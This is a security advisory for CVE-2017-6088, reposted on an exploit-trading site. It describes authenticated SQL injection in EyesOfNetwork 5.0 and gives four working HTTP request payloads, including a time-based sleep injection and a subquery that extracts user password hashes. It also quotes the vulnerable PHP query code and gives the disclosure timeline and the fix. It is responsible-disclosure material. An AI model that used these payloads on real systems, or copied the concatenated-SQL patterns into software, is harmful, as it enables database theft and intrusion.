0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
EyesOfNetwork (EON) 5.0 - SQL Injection Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
# [CVE-2017-6088] EON 5.0 Multiple SQL Injection ## Description EyesOfNetwork ("EON") is an OpenSource network monitoring solution. ## SQL injection (authenticated) The Eonweb code does not correctly filter arguments, allowing authenticated users to inject arbitrary SQL requests. **CVE ID**: CVE-2017-6088 **Access Vector**: remote **Security Risk**: medium **Vulnerability**: CWE-89 **CVSS Base Score**: 6.0 **CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L ### Proof of Concept 1 (root privileges) The following HTTP request allows an attacker (connected as administrator) to dump the database contents using SQL injections inside either the `bp_name` or the `display` parameter. These requests are executed with MySQL root privileges. ``` https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271 https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1 ``` #### Vulnerable code The vulnerable code can be found inside the `module/monitoring_ged/ged_functions.php` file, line 114: ``` function list_process($bp,$display,$bdd){ $sql = "select name from bp where is_define = 1 and name!='".$bp."' and priority = '" . $display . "'"; $req = $bdd->query($sql); $process = $req->fetchall(); echo json_encode($process); } ``` ### Proof of Concept 2 The following HTTP request allows an attacker to dump the database contents using SQL injections inside the `type` parameter: ``` https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time= ``` #### Vulnerable code The vulnerable code can be found inside the `module/monitoring_ged/ajax.php` file, line 64: ``` if($_GET["type"] == 0){ $ged_where = "WHERE pkt_type_id!='0'"; } else { $ged_where = "WHERE pkt_type_id='".$_GET["type"]."'"; } $gedsql_result1=sqlrequest($database_ged,"SELECT pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<'100';"); ``` ### Proof of Concept 3 The following HTTP request allows an attacker to dump the database contents using SQL injections inside the `search` parameter: ``` https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time= ``` #### Vulnerable code The vulnerable code can be found inside the `module/monitoring_ged/ged_functions.php` file, line 129. ``` if($search != ""){ $like = ""; if( substr($search, 0, 1) === '*' ){ $like .= "%"; } $like .= trim($search, '*'); if ( substr($search, -1) === '*' ) { $like .= "%"; } $where_clause .= " AND $filter LIKE '$like'"; } ``` ### Proof of Concept 4 The following HTTP request allows an attacker to dump the database contents using SQL injections inside the `equipment` parameter: ``` https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit 1)&queue=history ``` #### Vulnerable code The vulnerable code can be found inside the `module/monitoring_ged/ged_functions.php` file, line 493: ``` $gedsql_result1=sqlrequest($database_ged,"SELECT pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!='0' AND pkt_type_id<'100';"); while($ged_type = mysqli_fetch_assoc($gedsql_result1)){ $sql = "SELECT DISTINCT $filter FROM ".$ged_type["pkt_type_name"]."_queue_".$queue; $results = sqlrequest($database_ged, $sql); while($result = mysqli_fetch_array($results)){ if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){ array_push($datas, $result[$filter]); } } } ``` ## Timeline (dd/mm/yyyy) * 01/10/2016 : Initial discovery. * 09/10/2016 : Fisrt contact with vendor. * 23/10/2016 : Technical details sent to the security contact. * 27/10/2016 : Vendor akwnoledgement and first patching attempt. * 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed. * 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our repsonsible disclosure agreement. * 14/03/2017 : Public disclosure. Thank you to EON for the fast response. ## Solution Update to version 5.1. ## Affected versions * Version <= 5.0 ## Credits * Nicolas SERRA <n.serra@sysdream.com> -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream # 0day.today [2024-09-28] #